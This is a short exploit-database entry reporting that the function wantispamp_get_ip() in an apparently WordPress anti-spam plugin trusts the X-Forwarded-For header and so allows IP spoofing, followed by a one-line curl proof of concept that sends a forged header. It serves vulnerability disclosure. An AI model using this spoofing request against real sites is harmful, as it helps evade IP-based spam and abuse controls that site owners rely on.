Share
## https://sploitus.com/exploit?id=WPEX-ID:F1AF4267-3A43-4B88-A8B9-C1D5B2AA9D68
The function wantispamp_get_ip() is vulnerable to IP spoofing because of the general usage of $_SERVER['HTTP_X_FORWARDED_FOR']
curl -i -H 'X_FORWARDED_FOR: 0.0.0.0' https://example.com